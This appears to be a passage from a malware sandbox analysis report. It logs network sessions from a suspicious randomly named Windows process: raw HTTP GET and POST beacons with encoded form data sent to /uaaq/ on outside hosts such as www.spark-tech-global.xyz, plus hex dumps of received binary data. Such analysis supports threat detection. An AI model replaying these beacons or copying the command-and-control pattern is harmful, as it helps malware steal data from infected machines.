9a 8a a6 21 ad c4 4d 3c fa ec 1d 99 50 c5 0f 12 a8 cc dc 77 00 cb 1b 12 b9 c4 f7 89 72 44 a3 c0 3e 21 07 4d 0e 98 0a 05 a4 18 d2 28 59 1e aa c1 64 e0 05 c8 bc 54 d1 d0 1b 42 b3 a0 44 aa c0 19 26 09 7a 2b f1 b5 98 50 3e 43 14 b7 84 6d 4d e1 d8 8e dc 30 51 92 65 08 6d 43 c2 d0 73 6d 92 b8 81 df f4 9c af 3f c5 81 af a6 ea c5 e4 06 cd 31 a5 33 a2 4d 22 12 4e d5 67 17 ea bf 31 fc 67 89 3a c8 34 86 83 a0 ce a8 0d f5 df 38 e4 e0 67 00 45 1a 00 f7 81 8e 8e 80 3f cc 74 1d a9 dc 4c 30 18 73 fe 58 13 3d 5e d0 51 cc 81 e7 91 b7 05 18 80 58 9d 07 ab 75 6d a8 0e e5 35 85 aa 01 c0 7b 3a 0b 3d 02 4a f4 bd 9b 40 66 38 1f 79 6e 3c a5 91 3a b8 d8 85 2b 51 c7 26 48 1c 44 d4 6c 77 1d d2 35 f7 0c 32 36 69 67 34 ea 77 db e3 7e ab df e9 1b 1d ba 47 ad 8e a5 5e 02 89 00 9b 01 34 fa b9 cd 79 90 24 72 44 49 64 4f 45 46 43 4d 48 34 a1 09 63 45 00 bc f2 93 68 f9 0e 3a 56 c2 05 91 b2 bf 85 cf 6f e2 c3 8b 98 e1 1e 26 34 9a 0d e3 24 72 fd c9 25 b2 f3 d7 39 8d 96 9a eb 87 73 6c ba 88 fe 75 ee 46 d0 8d 58 17 5d 2d a2 5e 7e 6c a8 ae ff 1a 6c cb 1c 94 12 4a 70 03 73 d9 c8 78 fc 59 7d c7 84 01 0c be 8d 26 c4 77 cf 99 1a a9 1f 77 6a e6 ab 0a 34 6b 69 e2 cc 5c a4 e9 ce 18 5f b9 c8 be c3 84 b7 a3 4f d4 46 99 55 f0 7e 1d be 18 95 e6 4e ca b8 08 35 d1 f5 9a f3 d0 0b 88 13 37 2d c3 6a 35 4d a3 69 43 57 0d a9 a3 19 86 39 a4 0e 68 b7 a3 75 f4 4f 21 76 17 51 e4 a7 3b 42 cf 6c ab 3a e8 98 56 43 9d 52 77 32 4d c4 8b 4d d2 9e c1 05 0a 1a e2 05 93
                                                                                    Data Ascii: }vH}NdU)Srw$,@(JyoO~O *"yo_wi2=<_8>TYU<OV3(o(H]4cDo&JdFF(H~=k(SlS. JpdzS{i(&.&=44My?uc%v L{Ne&S%R?'J'ZQ4%t;5A&1!M<PwrD>!M(YdTBD&z+P>CmM0QemCsm?13M"Ng1g:48gE?tL0sX=^QXum5{:=J@f8yn<:+Q&HDlw526ig4w~G^4y$rDIdOEFCMH4cEh:Vo&4$r%9sluFX]-^~llJpsxY}&wwj4ki\_OFU~N57-j5MiCW9huO!vQ;Bl:VCRw2MM
                                                                                    Dec 4, 2023 12:10:11.099658966 CET1340INData Raw: e0 7a dd 41 48 09 70 c4 d0 48 cf 63 54 8e 0d e5 d5 8f 97 1f 2f 0f 9a bc 7b a6 66 be b9 62 c8 75 66 98 1f 3e cc 87 ac a7 8e 1f 6b 60 c0 c7 34 b1 a7 4f f9 b8 f5 b4 92 04 1f 84 f2 b1 8e 78 a0 dc 3e 76 a0 0a c3 17 c5 f1 d7 67 38 94 32 7b bc 6a 38 95
                                                                                    Data Ascii: zAHpHcT/{fbuf>k`4Ox>vg82{j8'<W'>)"tnyR-;'D;@,3`!#$`bPPGEq3h<MViuC7=gcGCz _q<Yd~B\
                                                                                    Dec 4, 2023 12:10:11.099730968 CET1340INData Raw: 35 d6 f7 c1 e6 29 b4 9e 77 38 18 7e 0f 29 fc 90 fa a0 9e 77 ba c3 ca d4 27 4f 0a e5 1b bc 3b 3f 02 25 44 d5 ad 2a 91 77 de 6a 8c 79 7e 09 77 7d ff c6 f8 1e 49 10 c8 28 d4 14 cc 01 5a e3 e5 e1 23 13 de 22 7c 7c 41 3c 6f 44 ec 13 b9 af cb 80 c6 e5
                                                                                    Data Ascii: 5)w8~)w'O;?%D*wjy~w}I(Z#"||A<oDXs?")m5R+vQs.9$Ex!xCMVJ9zcMRqD9|9,)0-8&@Rg/2pY^HyP2O!wDTdi
                                                                                    Dec 4, 2023 12:10:11.099797964 CET1340INData Raw: 2d ba a6 4d 38 74 38 8f 42 0f 41 f7 46 1d 93 96 eb 38 c1 3e 01 76 67 05 37 f4 f2 12 02 54 2d 12 65 25 6a 66 ab e3 d0 49 23 9a 8c 48 ad db 30 db bd 86 65 f5 1a 66 5d 01 23 04 89 35 b3 d3 69 f4 4d 48 6c d7 15 b4 4c f5 b5 a4 cb 12 ce 69 cb 62 5c 4f
                                                                                    Data Ascii: -M8t8BAF8>vg7T-e%jfI#H0ef]#5iMHlLib\OfZ1f7zJ kk<tF.LeWbf)!5]8NbeMAHvlhot@ Fi.H4I4m$k66sf%KDNvG7M =
                                                                                    Dec 4, 2023 12:10:11.099854946 CET1340INData Raw: 3c ab c2 29 6d 13 f3 c9 a9 3b 61 1b a8 14 52 98 7f 07 08 ca 8f 47 8a ad 64 f5 7a 3a 7b e2 fa 00 e7 22 9e 7f d6 04 ec 2a e1 3b 99 5f 96 e4 94 ef 6f 97 24 6f b2 25 32 b6 90 92 9d c2 d1 bb fb bb 9d 71 11 d2 05 ef 66 1c b1 a5 09 67 f7 53 2e e9 d5 1e
                                                                                    Data Ascii: <)m;aRGdz:{"*;_o$o%2qfgS.D&H/Zn]e]WdRX3{;V&.{{7dY8s6MfaL;:GvqeF9-WXkYol0^
                                                                                    Dec 4, 2023 12:10:11.099915028 CET1340INData Raw: ce 2a ce da 60 a5 c6 a8 98 b8 27 56 16 2c 9f 72 d3 26 24 cc 68 0a 24 eb 70 20 7c 11 81 d6 6a 95 a4 b8 02 b5 5e 88 74 d4 ef 10 47 aa 68 21 a1 58 4d 8e 96 33 58 cd 1e b7 a1 ac 6b 57 d0 0a 83 70 8e 53 99 8e a4 21 d5 78 d6 f3 6b 3a ce 5e ab 6f 28 65
                                                                                    Data Ascii: *`'V,r&$h$p |j^tGh!XM3XkWpS!xk:^o(e+a2,UED9%2z7)S!R>j)x2ij88^l#fvM?C/VvO)e.J'\~%tlw/W-868YsU7
                                                                                    Dec 4, 2023 12:10:11.099981070 CET1340INData Raw: aa e2 ef 25 38 2c db 96 7b 18 2a 96 9d a1 7b 18 38 96 4d c4 bd 0d 23 4b 15 b9 b7 41 65 a9 1e d7 0a 31 3f bf a5 70 db 1e 8d 0d cb 96 72 78 e8 24 36 9b 4a 2b b1 02 f2 b3 5d 22 ef b5 fa ed 7e 5f 5e 81 5e b3 30 ce 22 57 0f 7b 61 ba c6 97 e0 b1 69 be
                                                                                    Data Ascii: %8,{*{8M#KAe1?prx$6J+]"~_^^0"W{ai]c LpSwXhH^qX3YhU,JY(8ovwVlZ,:2$"3VfCV*:n56p?^N{Lm\~ZFXP,6f=Ows;7cKgv
                                                                                    Dec 4, 2023 12:10:11.100035906 CET1340INData Raw: 78 47 d9 fd dd 43 f6 e5 60 12 e6 7e 39 98 b4 e9 60 d2 6f 2d 20 fb 72 30 e9 be 05 6b 5f 0e 26 7d 39 98 f4 e5 60 52 45 6d 7e fb 21 df 97 83 49 f7 21 1c fc 72 30 e9 cb c1 a4 2f 07 93 be 1c 4c aa ac c7 5d 1f 4c 2a 26 17 ce 0a dc e9 fd dd 66 ab df 36
                                                                                    Data Ascii: xGC`~9`o- r0k_&}9`REm~!I!r0/L]L*&f6i[5G_J{V].zXExg-gF6hq=`{=x\q.T!Zv1hg[_)<d338TLOFoY2
                                                                                    Dec 4, 2023 12:10:11.100094080 CET1340INData Raw: f7 7a 86 39 32 ec 56 bf d3 1b ef 99 6d cb b4 e8 38 23 8e c0 1b 02 a1 1c 42 23 e3 84 4d e4 2f 42 9d 51 80 4e c1 62 20 fa 92 24 a4 a6 5c 28 4f 71 52 55 71 dc 88 cf ef 1d cf 0d c3 68 7b 49 f4 74 a0 fc ac 3c c5 07 e5 a3 72 a9 d4 ab 1c e6 55 b3 93 f5
                                                                                    Data Ascii: z92Vm8#B#M/BQNb $\(OqRUqh{It<rU =SJEEk{vt:{@" x0s oD/LqjSX& h$T/!8|C@8g~@6MkS`3Upx/ #B}95K_0d3Ny
                                                                                    Dec 4, 2023 12:10:11.100198984 CET265INData Raw: 8d ed 52 48 86 9e 3b ab ef 0b 8c 1d 00 2f 7f c3 51 4b ec 95 4c 87 79 0c 44 e9 18 02 1b 88 19 21 f1 e7 8f 50 f4 84 c7 31 78 77 dc 29 2d 4a f3 67 15 3d 81 10 ba e8 50 58 a6 46 9e 22 ba f4 c7 86 ca d7 a0 87 6c bd 72 98 4e c3 03 1b 4b a0 81 21 19 4f
                                                                                    Data Ascii: RH;/QKLyD!P1xw)-Jg=PXF"lrNK!OZkt53!n}{)-qC(p1h2MqVQuBT$6oD]Ize]l 5G|nLf<4Hm>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    85192.168.11.304984565.108.122.245803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:10:12.883680105 CET431OUTGET /uaaq/?9pG0L=H11jHdK8tiQEdc8HiBJGcTnPn4JeKO7dY7p2R0AEMYCSTpUW3HGmQSiGfhMiAqlsALoBPlIqyHCk3n5D4MLz3+EHJa2hwQp0yQ==&XFs82=6R5Xx6907 HTTP/1.1
                                                                                    Host: www.mariannaserocka.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:10:13.582057953 CET603INHTTP/1.1 301 Moved Permanently
                                                                                    Date: Mon, 04 Dec 2023 11:10:12 GMT
                                                                                    Server: Apache/2
                                                                                    X-Powered-By: PHP/8.1.25
                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                    X-UA-Compatible: IE=edge
                                                                                    X-Redirect-By: WordPress
                                                                                    Upgrade: h2,h2c
                                                                                    Connection: Upgrade, close
                                                                                    Location: http://mariannaserocka.com/uaaq/?9pG0L=H11jHdK8tiQEdc8HiBJGcTnPn4JeKO7dY7p2R0AEMYCSTpUW3HGmQSiGfhMiAqlsALoBPlIqyHCk3n5D4MLz3+EHJa2hwQp0yQ==&XFs82=6R5Xx6907
                                                                                    Vary: User-Agent
                                                                                    Content-Length: 0
                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    86192.168.11.3049846162.0.222.119803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:10:18.769345045 CET719OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.spark-tech-global.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.spark-tech-global.xyz
                                                                                    Referer: http://www.spark-tech-global.xyz/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 6a 6f 2f 57 42 5a 30 68 66 75 6f 30 48 46 65 37 4f 62 77 6f 54 63 64 6d 68 65 47 41 74 65 6a 30 33 32 42 66 53 75 62 45 49 43 37 6c 49 30 66 4d 31 6a 45 7a 31 50 41 70 69 5a 69 6e 48 6d 4e 33 4c 74 79 35 74 49 45 64 49 74 68 4b 33 4c 4e 6e 6c 57 69 63 56 44 58 6a 31 45 66 68 37 57 75 59 37 30 6f 55 4d 76 2b 51 33 2f 47 31 78 4d 6b 6d 4d 70 36 5a 2b 72 35 49 37 4d 30 34 5a 2f 5a 2b 67 53 58 79 47 39 55 53 41 46 50 44 44 73 67 37 46 68 76 32 44 47 63 7a 61 6a 4f 4e 43 65 70 54 7a 4d 68 76 51 70 54 65 79 67 6a 6b 4a 34 34 65 6f 67 3d 3d
                                                                                    Data Ascii: 9pG0L=jo/WBZ0hfuo0HFe7ObwoTcdmheGAtej032BfSubEIC7lI0fM1jEz1PApiZinHmN3Lty5tIEdIthK3LNnlWicVDXj1Efh7WuY70oUMv+Q3/G1xMkmMp6Z+r5I7M04Z/Z+gSXyG9USAFPDDsg7Fhv2DGczajONCepTzMhvQpTeygjkJ44eog==
                                                                                    Dec 4, 2023 12:10:19.108680964 CET587INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:10:18 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 389
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    87192.168.11.3049847162.0.222.119803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:10:21.468019962 CET739OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.spark-tech-global.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.spark-tech-global.xyz
                                                                                    Referer: http://www.spark-tech-global.xyz/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 6a 6f 2f 57 42 5a 30 68 66 75 6f 30 47 6b 4f 37 4d 38 45 6f 55 38 64 6e 6b 65 47 41 6a 4f 6a 77 33 78 4a 66 53 72 69 4a 50 77 76 6c 4e 6c 44 4d 6e 69 45 7a 32 50 41 70 32 70 69 69 49 47 4d 31 4c 74 75 62 74 4d 45 64 49 73 46 4b 33 4b 39 6e 6c 48 6a 4b 54 54 58 68 68 30 66 6a 2f 57 75 59 37 30 6f 55 4d 76 61 32 33 2b 75 31 32 34 59 6d 65 59 36 59 77 4c 35 48 38 4d 30 34 64 2f 5a 79 67 53 58 41 47 34 77 30 41 48 48 44 44 74 77 37 47 31 37 31 4d 47 63 39 55 44 50 69 47 4b 77 6d 37 4c 56 77 52 37 2f 2f 7a 79 65 44 42 4e 55 4e 76 59 54 36 47 4a 57 30 73 5a 6d 56 6f 43 55 2f 31 66 78 42 31 78 55 3d
                                                                                    Data Ascii: 9pG0L=jo/WBZ0hfuo0GkO7M8EoU8dnkeGAjOjw3xJfSriJPwvlNlDMniEz2PAp2piiIGM1LtubtMEdIsFK3K9nlHjKTTXhh0fj/WuY70oUMva23+u124YmeY6YwL5H8M04d/ZygSXAG4w0AHHDDtw7G171MGc9UDPiGKwm7LVwR7//zyeDBNUNvYT6GJW0sZmVoCU/1fxB1xU=
                                                                                    Dec 4, 2023 12:10:21.774564028 CET587INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:10:21 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 389
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    88192.168.11.3049848162.0.222.119803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:10:24.170696974 CET1656OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.spark-tech-global.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.spark-tech-global.xyz
                                                                                    Referer: http://www.spark-tech-global.xyz/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 6a 6f 2f 57 42 5a 30 68 66 75 6f 30 47 6b 4f 37 4d 38 45 6f 55 38 64 6e 6b 65 47 41 6a 4f 6a 77 33 78 4a 66 53 72 69 4a 50 77 33 6c 4e 33 4c 4d 6b 42 38 7a 33 50 41 70 71 35 69 6a 49 47 4e 74 4c 74 32 66 74 4e 34 72 49 76 74 4b 32 73 42 6e 78 69 44 4b 61 54 58 68 2b 6b 66 69 37 57 76 46 37 30 59 59 4d 76 4b 32 33 2b 75 31 32 2b 38 6d 4f 5a 36 59 79 4c 35 49 37 4d 30 38 5a 2f 5a 57 67 57 44 51 47 35 78 50 41 33 6e 44 44 4d 41 37 57 51 76 31 46 47 64 62 54 44 50 36 47 50 6f 50 37 4c 68 53 52 36 62 5a 7a 31 79 44 44 71 6b 56 71 49 6e 78 5a 49 79 4d 69 39 4b 71 70 58 45 45 6f 71 68 68 67 58 74 64 32 37 4d 67 39 4a 48 57 39 59 49 46 42 42 68 56 31 78 50 47 63 62 30 64 36 47 6d 53 35 4d 44 38 6d 57 46 34 71 68 5a 55 62 61 2f 66 43 6e 4a 44 57 76 66 2b 65 46 6e 55 5a 78 7a 6e 43 6c 61 59 65 2b 66 39 54 55 36 70 4e 6b 4c 77 35 45 69 56 77 35 6e 71 66 42 4e 42 5a 6f 76 36 72 55 5a 62 35 56 78 72 38 33 4f 67 63 71 4d 31 30 71 6b 53 6b 4a 5a 2b 44 6c 72 42 52 45 74 4b 63 78 51 30 33 68 70 62 71 4f 4f 51 47 31 4f 73 53 4b 67 67 67 51 69 34 32 67 39 70 74 69 74 4b 6d 6d 69 74 34 54 4f 36 2b 69 35 2b 47 52 62 70 42 31 48 77 48 68 36 6c 57 6b 36 4d 69 42 59 43 2b 32 79 36 75 6c 71 32 50 5a 6f 77 2b 43 45 56 39 48 4b 43 79 68 4d 79 6e 70 50 63 33 63 78 2f 6e 44 59 6c 38 6e 6e 64 2b 50 66 5a 43 44 43 46 48 6d 48 41 57 66 5a 7a 4c 38 52 77 51 52 4e 2f 6e 42 69 51 52 39 44 49 6e 31 6c 31 54 59 67 4e 46 38 65 75 63 2b 4b 4d 73 61 2b 76 45 50 4a 48 47 4d 30 30 36 41 34 39 78 77 7a 64 42 68 6e 46 38 53 65 48 4b 6b 53 63 7a 68 70 75 4e 51 50 37 43 4c 72 53 43 6d 55 4b 63 5a 7a 74 53 6e 4d 79 46 41 72 70 49 54 62 77 6b 4f 77 42 77 61 66 67 6d 48 76 75 4d 42 42 58 6e 30 53 65 55 76 66 52 55 49 53 78 38 6a 53 69 57 44 72 51 6e 52 4a 35 74 6c 62 39 66 39 47 35 79 62 77 6d 4d 43 70 63 45 54 61 74 39 67 6e 53 42 70 53 6d 38 74 4b 73 54 57 38 48 2b 2f 6e 42 4e 65 44 64 50 33 49 31 77 44 5a 75 68 44 62 34 47 30 72 4f 62 67 39 71 47 68 4a 41 71 2f 42 39 37 58 63 56 41 48 42 64 4f 67 6a 31 64 4d 79 34 59 59 6d 45 50 63 70 48 34 63 61 61 2b 33 54 31 36 5a 4e 44 71 63 41 31 79 4b 73 46 75 62 78 2b 41 43 72 75 62 36 50 78 6d 52 46 54 49 48 7a 51 70 66 31 79 48 46 5a 4b 33 6e 6c 62 6a 56 67 59 57 45 32 69 4f 69 39 43 47 42 38 66 2f 37 5a 2b 52 71 4a 6e 50 44 75 47 5a 70 73 4a 59 33 65 62 31 64 41 54 2f 4e 63 72 5a 72 79 35 6d 65 51 32 56 2f 34 77 71 76 54 51 55 5a 57 37 45 6d 39 43 6b 55 71 33 32 31 58 65 51 72 70 70 71 63 53 61 39 61 2f 32 69 77 6f 2b 52 41 42 72 34 55 4d 33 77 37 75 54 38 74 66 43 4d 6a 42 32 4e 45 30 65 34 2f 69 49 6c 2f 35 7a 46 72 32 46 59 45 47 51 49 72 77 4b 71 5a 50 63 71 55 38 31 4f 54 38 56 4e 2f 6a 68 50 6a 45 70 55 78 42 6c 66 4c 37 4b 71 39 34 57 51 63 62 70 4d 38 4d 66 68 74 57 77 34 56 66 4a 59 6b 30 35 47 79 74 77 64 59 6b 6a 37 6a 47 67 49 46 2f 4b 71 68 44 62 6e 6c 65 68 52 6b 52 58 35 6c 33 4a 7a 43 70 42 58 4e 43 68 6d 71 6c 65 47 53 2f 31 4f 76 37 4a 6c 6c 4d 47 71 39 6d 46 62 72 35 53 64 34 31 6f 62 6e 64 68 2f 47 78 79 6a 42 52 77 4d 53 2b 57 77 32 46 52 36 55 72 4e 64 4d 47 65 2b 50 35 50 46 54 33 72 36 41 51 43 7a 57 48 51 55 4a 42 69 42 37 6e 57 31 67 71 54 4b 69 76 32 36 54 62 77 70 50 38 51 53 52 70 44 37 41 31 54 4c 65 6a 74 73 6d 4b 4a 49 69 34 4f 38 4a 5a 68 30 57 6c 61 45 7a 68 41 6b 6f 68 4d 5a 67 33 46 4c 33 6b 4e 30 44 43 76 57 7a 6a 72 48 53 4b 4d 65 69 42 2b 58 4f 4a 66
                                                                                    Data Ascii: 9pG0L=jo/WBZ0hfuo0GkO7M8EoU8dnkeGAjOjw3xJfSriJPw3lN3LMkB8z3PApq5ijIGNtLt2ftN4rIvtK2sBnxiDKaTXh+kfi7WvF70YYMvK23+u12+8mOZ6YyL5I7M08Z/ZWgWDQG5xPA3nDDMA7WQv1FGdbTDP6GPoP7LhSR6bZz1yDDqkVqInxZIyMi9KqpXEEoqhhgXtd27Mg9JHW9YIFBBhV1xPGcb0d6GmS5MD8mWF4qhZUba/fCnJDWvf+eFnUZxznClaYe+f9TU6pNkLw5EiVw5nqfBNBZov6rUZb5Vxr83OgcqM10qkSkJZ+DlrBREtKcxQ03hpbqOOQG1OsSKgggQi42g9ptitKmmit4TO6+i5+GRbpB1HwHh6lWk6MiBYC+2y6ulq2PZow+CEV9HKCyhMynpPc3cx/nDYl8nnd+PfZCDCFHmHAWfZzL8RwQRN/nBiQR9DIn1l1TYgNF8euc+KMsa+vEPJHGM006A49xwzdBhnF8SeHKkSczhpuNQP7CLrSCmUKcZztSnMyFArpITbwkOwBwafgmHvuMBBXn0SeUvfRUISx8jSiWDrQnRJ5tlb9f9G5ybwmMCpcETat9gnSBpSm8tKsTW8H+/nBNeDdP3I1wDZuhDb4G0rObg9qGhJAq/B97XcVAHBdOgj1dMy4YYmEPcpH4caa+3T16ZNDqcA1yKsFubx+ACrub6PxmRFTIHzQpf1yHFZK3nlbjVgYWE2iOi9CGB8f/7Z+RqJnPDuGZpsJY3eb1dAT/NcrZry5meQ2V/4wqvTQUZW7Em9CkUq321XeQrppqcSa9a/2iwo+RABr4UM3w7uT8tfCMjB2NE0e4/iIl/5zFr2FYEGQIrwKqZPcqU81OT8VN/jhPjEpUxBlfL7Kq94WQcbpM8MfhtWw4VfJYk05GytwdYkj7jGgIF/KqhDbnlehRkRX5l3JzCpBXNChmqleGS/1Ov7JllMGq9mFbr5Sd41obndh/GxyjBRwMS+Ww2FR6UrNdMGe+P5PFT3r6AQCzWHQUJBiB7nW1gqTKiv26TbwpP8QSRpD7A1TLejtsmKJIi4O8JZh0WlaEzhAkohMZg3FL3kN0DCvWzjrHSKMeiB+XOJf
                                                                                    Dec 4, 2023 12:10:24.483431101 CET587INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:10:24 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 389
                                                                                    Connection: close
                                                                                    Content-Type: text/html
